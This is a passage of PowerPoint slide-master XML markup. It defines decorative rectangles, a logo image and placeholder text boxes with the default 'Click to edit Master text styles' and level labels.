              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" sz="9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 name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="98280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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55" name="Rectangle 10"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Picture 7" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485000" y="6437880"/>
            <a:ext cx="1125360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="729720"/>
            <a:ext cx="11029320" cy="492480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1391400"/>
            <a:ext cx="5194440" cy="4469040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630000" lvl="1" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="281"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="900000" lvl="2" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1242000" lvl="3" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1602000" lvl="4" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6415920" y="1391400"/>
            <a:ext cx="5194440" cy="4469040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630000" lvl="1" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="281"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="900000" lvl="2" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1242000" lvl="3" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1602000" lvl="4" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="6423840"/>
            <a:ext cx="284436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r>
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="6423840"/>
            <a:ext cx="6916680" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">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62" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="6423840"/>
            <a:ext cx="105228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fld id="{170BA050-B0E7-48E6-B8DC-DFB0EA27B957}" type="slidenum">
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" sz="9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 name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="98280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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68" name="Rectangle 10"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="Picture 7" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485000" y="6437880"/>
            <a:ext cx="1125360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="729720"/>
            <a:ext cx="11029320" cy="987840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="2250720"/>
            <a:ext cx="5194440" cy="557280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="2926080"/>
            <a:ext cx="5194440" cy="2934720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630000" lvl="1" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="281"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="900000" lvl="2" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1242000" lvl="3" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1602000" lvl="4" indent="-234000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="221"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6415920" y="2250720"/>
            <a:ext cx="5194440" cy="552960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6415920" y="2926080"/>
            <a:ext cx="5194440" cy="2934720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630000" lvl="1" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="281"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
